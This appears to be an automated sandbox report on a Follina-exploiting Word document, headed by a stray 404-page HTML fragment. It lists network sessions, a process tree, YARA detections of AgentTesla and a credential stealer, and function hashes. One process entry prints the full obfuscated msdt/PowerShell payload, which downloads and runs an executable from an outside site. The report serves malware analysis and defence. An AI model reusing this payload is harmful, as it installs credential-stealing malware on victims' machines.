<!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.5	49709	118.27.125.229	443	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-12-20 13:14:37 UTC	16	OUT	GET /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16) Accept-Encoding: gzip, deflate Host: pzsrblog.com If-Modified-Since: Tue, 20 Dec 2022 05:25:57 GMT Connection: Keep-Alive
2022-12-20 13:14:38 UTC	16	IN	HTTP/1.1 304 Not Modified Date: Tue, 20 Dec 2022 13:14:37 GMT Connection: close Server: LiteSpeed cache-control: public, max-age=1 expires: Tue, 20 Dec 2022 13:14:38 GMT vary: Accept-Encoding x-turbo-charged-by: LiteSpeed

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.5	49710	118.27.125.229	443	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-12-20 13:14:38 UTC	16	OUT	HEAD /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1 Authorization: Bearer X-MS-CookieUri-Requested: t X-IDCRL_ACCEPTED: t User-Agent: Microsoft Office Existence Discovery Host: pzsrblog.com Connection: Keep-Alive
2022-12-20 13:14:39 UTC	17	IN	HTTP/1.1 200 OK Date: Tue, 20 Dec 2022 13:14:39 GMT Content-Length: 8032 Connection: close Server: LiteSpeed cache-control: public, max-age=1 expires: Tue, 20 Dec 2022 13:14:40 GMT last-modified: Tue, 20 Dec 2022 05:25:57 GMT accept-ranges: bytes vary: Accept-Encoding x-turbo-charged-by: LiteSpeed

Target ID:	0
Start time:	14:14:18
Start date:	20/12/2022
Path:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x2f0000
File size:	1937688 bytes
MD5 hash:	0B9AB9B9C4DE429473D6450D4297A123
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	1
Start time:	14:14:23
Start date:	20/12/2022
Path:	C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Imagebase:	0x2d0000
File size:	466688 bytes
MD5 hash:	EA19F4A0D18162BE3A0C8DAD249ADE8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Target ID:	4
Start time:	14:14:41
Start date:	20/12/2022
Path:	C:\Windows\SysWOW64\msdt.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\msdt.exe" ms-msdt:/ID pcwdIAGNOstIC /SKIp fOrCe /PaRAm "it_rEBRowSEFoRFIlE=#6Aw IT_LaunchMethod=ContextMenu IT_BrowseForFile=4N0$(iEX($(iex('[SYsTeM.text.EnCoDIng]'+[cHAr]58+[chAR]0x3a+'uTf8.gEtString([SyStEm.CoNVErt]'+[chAR]58+[CHAR]0X3a+'FRoMBAse64sTriNg('+[Char]0X22+'U1RPcC1wUm9jRVNTIC1GT1JDZSAtTkFtZSAnbXNkdCc7JDggPSBBZGQtdFlQZSAtTUVtQkVyZEVGSU5pdGlPTiAnW0RsbEltcG9ydCgiVXJMTW9uLmRsbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgSkcsc3RyaW5nIFVXYSxzdHJpbmcgcFksdWludCBlYyxJbnRQdHIgcnEpOycgLU5BbUUgIlFDIiAtbmFNRVNwYUNFIGd1IC1QYXNzVGhydTsgJDg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHBzOi8vcHpzcmJsb2cuY29tL3dwLWNvbnRlbnQvdXBsb2Fkcy8yMDEyL1BST01ad0ZwMzg1dlhyTi5leGUiLCIkRW5WOkFQUERBVEFcUFJPTVp3RnAzODV2WHJOLmV4ZSIsMCwwKTtTdGFSVC1zbEVlcCgzKTtJbnZPa0UtSVRlbSAiJGVudjpBUFBEQVRBXFBST01ad0ZwMzg1dlhyTi5leGUiO3N0T3AtUFJPY2VTUyAtZk9SY0UgLW5hbWUgJ3NkaWFnbmhvc3Qn'+[chaR]0x22+'))'))))m3/../../../../../../../../../../../../../../../../.Exe
Imagebase:	0x190000
File size:	1508352 bytes
MD5 hash:	7F0C51DBA69B9DE5DDF6AA04CE3A69F4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000004.00000002.444972338.00000000030C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000004.00000002.443928624.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000004.00000002.443928624.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000004.00000002.443795153.0000000002D90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000004.00000002.443908283.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000004.00000002.443908283.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

Target ID:	9
Start time:	14:15:18
Start date:	20/12/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yjsbg2wl\yjsbg2wl.cmdline
Imagebase:	0x930000
File size:	2170976 bytes
MD5 hash:	350C52F71BDED7B99668585C15D70EEA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Show Windows behavior

Target ID:	10
Start time:	14:15:19
Start date:	20/12/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBBFF.tmp" "c:\Users\user\AppData\Local\Temp\yjsbg2wl\CSCC31FCDA79CE4E0C894720F359978C2.TMP"
Imagebase:	0xcc0000
File size:	43176 bytes
MD5 hash:	C09985AE74F0882F208D75DE27770DFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	11
Start time:	14:15:21
Start date:	20/12/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zf01cjt2\zf01cjt2.cmdline
Imagebase:	0x7ff7c8a30000
File size:	2170976 bytes
MD5 hash:	350C52F71BDED7B99668585C15D70EEA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Show Windows behavior

Target ID:	12
Start time:	14:15:22
Start date:	20/12/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC7C7.tmp" "c:\Users\user\AppData\Local\Temp\zf01cjt2\CSCBCE7B9C025BF4B8F8112717E4D466AA3.TMP"
Imagebase:	0xcc0000
File size:	43176 bytes
MD5 hash:	C09985AE74F0882F208D75DE27770DFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	13
Start time:	14:15:27
Start date:	20/12/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mnm1snwx\mnm1snwx.cmdline
Imagebase:	0x930000
File size:	2170976 bytes
MD5 hash:	350C52F71BDED7B99668585C15D70EEA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Target ID:	14
Start time:	14:15:29
Start date:	20/12/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE5AF.tmp" "c:\Users\user\AppData\Local\Temp\mnm1snwx\CSCC987513427A042F884BC2F5ADDB1C11C.TMP"
Imagebase:	0xcc0000
File size:	43176 bytes
MD5 hash:	C09985AE74F0882F208D75DE27770DFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	15
Start time:	14:15:42
Start date:	20/12/2022
Path:	C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe"
Imagebase:	0x7b0000
File size:	1187840 bytes
MD5 hash:	65FACCEC1C27EA47BF295191E93BFF41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.581985407.0000000003F3D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000002.581985407.0000000003F3D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 0000000F.00000002.581985407.0000000003F3D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000F.00000002.552178062.0000000002E7F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Target ID:	17
Start time:	14:16:13
Start date:	20/12/2022
Path:	C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0xad0000
File size:	1187840 bytes
MD5 hash:	65FACCEC1C27EA47BF295191E93BFF41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000000.544511148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000011.00000000.544511148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000011.00000000.544511148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000011.00000002.629534888.0000000003374000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.622387434.0000000003114000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Target ID:	19
Start time:	14:16:42
Start date:	20/12/2022
Path:	C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe"
Imagebase:	0xa60000
File size:	1187840 bytes
MD5 hash:	65FACCEC1C27EA47BF295191E93BFF41
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.642900479.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000013.00000002.642900479.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000013.00000002.642900479.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.644029749.000000000411D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000013.00000002.644029749.000000000411D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000013.00000002.644029749.000000000411D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000013.00000002.625883552.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 38%, ReversingLabs

Show Windows behavior

Execution Graph

Execution Coverage:	14.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	10.5%
Total number of Nodes:	95
Total number of Limit Nodes:	3

Executed Functions

Function 0766E300 Relevance: 5.4, Strings: 4, Instructions: 356
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

e~, xrefs: 0766E63D
JTTe, xrefs: 0766E4A3
JTTe, xrefs: 0766E4C1
JTTe, xrefs: 0766E4AA

Memory Dump Source

Source File: 0000000F.00000002.603576430.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7660000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID: JTTe$JTTe$JTTe$e~
API String ID: 0-2114007200
Opcode ID: bfabef264437fe5901763a82c4203006fcb8689bce8f69aadba31f108c401413
Instruction ID: dd1c5cf6768b512c593c070e1276d6d4e3c458101c797459c1644d83dfb36442
Opcode Fuzzy Hash: bfabef264437fe5901763a82c4203006fcb8689bce8f69aadba31f108c401413
Instruction Fuzzy Hash: 30E16EB8A1420ACFCB04CFA9D4854EEFBB2FF49300B54D55AD416AB214D335EA46CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0766E373 Relevance: 5.3, Strings: 4, Instructions: 336
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

e~, xrefs: 0766E63D
JTTe, xrefs: 0766E4A3
JTTe, xrefs: 0766E4C1
JTTe, xrefs: 0766E4AA

Memory Dump Source

Source File: 0000000F.00000002.603576430.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7660000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID: JTTe$JTTe$JTTe$e~
API String ID: 0-2114007200
Opcode ID: e8cc53ee6739d60fdca51dc70c9dda814ea55d637eb0ecd32f120665bfee61b8
Instruction ID: a37cbe43ea0cc9d4139693023b08407aa5899bac5162ced4965bbf411b7741a7
Opcode Fuzzy Hash: e8cc53ee6739d60fdca51dc70c9dda814ea55d637eb0ecd32f120665bfee61b8
Instruction Fuzzy Hash: 4FD16EB8E1420ACFCB04CFA5D4854AEFBB2FF89300B54C55AD416AB204D735EA46CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0766E31E Relevance: 5.3, Strings: 4, Instructions: 333
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

e~, xrefs: 0766E63D
JTTe, xrefs: 0766E4A3
JTTe, xrefs: 0766E4C1
JTTe, xrefs: 0766E4AA

Memory Dump Source

Source File: 0000000F.00000002.603576430.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7660000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID: JTTe$JTTe$JTTe$e~
API String ID: 0-2114007200
Opcode ID: d1bcc6b67d4989b95ea85d4586e478bc13e341d76717f604cd190a43915b1d8a
Instruction ID: 0d56db08736105ce7021dba88bb200359a9c25cc5dbd1d27c344d5d70d137a33
Opcode Fuzzy Hash: d1bcc6b67d4989b95ea85d4586e478bc13e341d76717f604cd190a43915b1d8a
Instruction Fuzzy Hash: 1ED15CB4E1420ACFCB04CFA5D4858AEFBB2FF89300F54955AC416AB205D735EA46CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0766E3E8 Relevance: 5.3, Strings: 4, Instructions: 290
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

e~, xrefs: 0766E63D
JTTe, xrefs: 0766E4A3
JTTe, xrefs: 0766E4C1
JTTe, xrefs: 0766E4AA

Memory Dump Source

Source File: 0000000F.00000002.603576430.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7660000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID: JTTe$JTTe$JTTe$e~
API String ID: 0-2114007200
Opcode ID: 2d233e922bed942d629da8275c8c9545e62a354f89ec7f2361f295a1e28795ec
Instruction ID: 68e98631773be82bb7dd4202f8fedd3e4e836ca4a3eced426d974bfb67275f42
Opcode Fuzzy Hash: 2d233e922bed942d629da8275c8c9545e62a354f89ec7f2361f295a1e28795ec
Instruction Fuzzy Hash: 01D15CB4E1420ADFCB04CFA9C4858AEFBB2FF89300F54D55AD406AB214D735AA46CF95

Uniqueness

Uniqueness Score: -1.00%

Function 08C3BD38 Relevance: 4.4, Strings: 3, Instructions: 628
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$%|`, xrefs: 08C3C270
U, xrefs: 08C3C407
U, xrefs: 08C3C42C

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID: $%|`$U$U
API String ID: 0-900978939
Opcode ID: 9d5f18a35d1fc0150ae09ad9ea7260e4f70e6a23be4403b3b0837f56f7f42d01
Instruction ID: d774b7e446da8d532084cf64e9e86e9d8b8c76fa93a19221438bd48f813913be
Opcode Fuzzy Hash: 9d5f18a35d1fc0150ae09ad9ea7260e4f70e6a23be4403b3b0837f56f7f42d01
Instruction Fuzzy Hash: AE32CE71B012249FDB19DBA5C554BAEB7F6AF88301F24846DE506EB3A1CB35DE02CB50

Uniqueness

Uniqueness Score: -1.00%

Function 07668120 Relevance: 2.6, Instructions: 2589COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.603576430.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7660000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fdeb985d89197e93156976b515087cf69dc7c8f8275ae8b191ac675ae4a62e6
Instruction ID: 71718d986d11d20de72b99bb7c1f0a2f89cde6f180ec6e58097377384f11adb7
Opcode Fuzzy Hash: 1fdeb985d89197e93156976b515087cf69dc7c8f8275ae8b191ac675ae4a62e6
Instruction Fuzzy Hash: 0B43EEB4A00219CFCB24DF68C988A9DB7B2FF89314F558599D45AAB361CB34ED81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0766BF3D Relevance: 1.5, Strings: 1, Instructions: 261COMMON

Download Yara Rule

Strings

_Mlz, xrefs: 0766C0F2

Memory Dump Source

Source File: 0000000F.00000002.603576430.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7660000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID: _Mlz
API String ID: 0-3018875634
Opcode ID: 05da14f8856422c111f5bb11d129a9e61a25ecce0af5aa4c4a2e28f85837d04c
Instruction ID: f34a68f375eddcbd3053d1a397e0c6b4e4aa3c18018c6c7e2cb09a81c3f69867
Opcode Fuzzy Hash: 05da14f8856422c111f5bb11d129a9e61a25ecce0af5aa4c4a2e28f85837d04c
Instruction Fuzzy Hash: 1CA13AB5E052089FCB08DFE9D8846EEBBB2EF89310F10902AD419BB354D7359946CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0766BFC0 Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

_Mlz, xrefs: 0766C0F2

Memory Dump Source

Source File: 0000000F.00000002.603576430.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7660000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID: _Mlz
API String ID: 0-3018875634
Opcode ID: 08514e7f1d8be2fb13b34612d0b22ad19d1209ed4b4d16fdb4a734320ce10473
Instruction ID: dd1df45b4e27808edc56029b8df250b621b2b66d0e17716cad7ecfb6bd8201eb
Opcode Fuzzy Hash: 08514e7f1d8be2fb13b34612d0b22ad19d1209ed4b4d16fdb4a734320ce10473
Instruction Fuzzy Hash: DE81C6B4E116099FDB08CFE9C484A9EFBB2FF89300F14902AD455BB254D735A942CF54

Uniqueness

Uniqueness Score: -1.00%

Function 07663B48 Relevance: .9, Instructions: 857COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.603576430.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7660000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 222806408863d35aaf51a4499449066596366d7d0939d843df14d3211a4e9107
Instruction ID: 63736aac8fbf421b2bea0ec00fcd007535cbe1547df3bebe8d7f2070349ecd4c
Opcode Fuzzy Hash: 222806408863d35aaf51a4499449066596366d7d0939d843df14d3211a4e9107
Instruction Fuzzy Hash: 4D6259B4E0025ACFCB10DFA9C8886ADFBB1FF89300F548599E446AB355DB30A995CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05B70C50 Relevance: .6, Instructions: 562COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.595866553.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_5b70000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a0777dfde4349b84c53c91c71752861d6654938815444e3f77f36427875f84d
Instruction ID: 92ab2bd77cb659b88e326a43fd89225e2ed72b11482ef34c6496d92130a46853
Opcode Fuzzy Hash: 6a0777dfde4349b84c53c91c71752861d6654938815444e3f77f36427875f84d
Instruction Fuzzy Hash: 4E224D70A002599FDB14DF69C854AAEBBF6FF88704F148469E41AEB391DF34AD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0766ADE0 Relevance: .5, Instructions: 527COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.603576430.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7660000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66ebae2ec31f25a8439f6b72b448f58faaae427eeb6a88ea533c66cb875156a8
Instruction ID: 2073fc05d34aa6b33f849f23f5704bf5828ac72880067d377ab35ecdb421c750
Opcode Fuzzy Hash: 66ebae2ec31f25a8439f6b72b448f58faaae427eeb6a88ea533c66cb875156a8
Instruction Fuzzy Hash: 4502D1F0700256DFCB15DB78C48866EBBA3AFC5204B698469D40BDB3A1DB35DC42C792

Uniqueness

Uniqueness Score: -1.00%

Function 07662DF0 Relevance: .5, Instructions: 477COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.603576430.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7660000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8078c34225c35a984901fffd4b57c3fdfdc5b74e8169ee547bdcfeed1f1c936
Instruction ID: f0472e3a8e3a1a4c3b2a8e57d8acd21fc1c2b72b12d4237b2b16e872e4770a3f
Opcode Fuzzy Hash: d8078c34225c35a984901fffd4b57c3fdfdc5b74e8169ee547bdcfeed1f1c936
Instruction Fuzzy Hash: 45225871A00219CFCB10DF69C888A9DB7B2FF89314F55C5A9E40AAB365DB30AD85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05B713B8 Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.595866553.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_5b70000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40b3b54afd5c1e3124459632daf73a270e37cc47d31c0d9bc60b0d208ae8e03a
Instruction ID: b069ddaf4d8b562defe14cb10fa636ba991b4fc5ff894bf2ac7f4b5d2d65dbcb
Opcode Fuzzy Hash: 40b3b54afd5c1e3124459632daf73a270e37cc47d31c0d9bc60b0d208ae8e03a
Instruction Fuzzy Hash: 8ED12C74A04119DFCB14CF9DD984AADBBF6FF88341F1981A5E425AB261DB30E941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 08C353CA Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09557f9aaea213f0f41fa0028376bdafc2b723c6649d05121a10d2ee251f4945
Instruction ID: b820f0d412b2664d89a1d46b5bc483bddf1ff017d7cf177b541918f62576c31a
Opcode Fuzzy Hash: 09557f9aaea213f0f41fa0028376bdafc2b723c6649d05121a10d2ee251f4945
Instruction Fuzzy Hash: 7CB135B4E05269CFCB08CFAAC5416DEFBF2BF89301F14952AD405AB328D7349942CB65

Uniqueness

Uniqueness Score: -1.00%

Function 08C33F48 Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d8175ce197d9d3b2e3da0cda9cc2a69082372d4f0bc0915085998086482d4cd
Instruction ID: 24735cd24cde78102585df616f693d84ff36385cd17052c3a8e40e52d2de03d4
Opcode Fuzzy Hash: 5d8175ce197d9d3b2e3da0cda9cc2a69082372d4f0bc0915085998086482d4cd
Instruction Fuzzy Hash: 82B1AF74A11249DFCB44DFB9E494A8DBBF2FB88309B50C469E405EB364EB359A42CF14

Uniqueness

Uniqueness Score: -1.00%

Function 08C33F58 Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
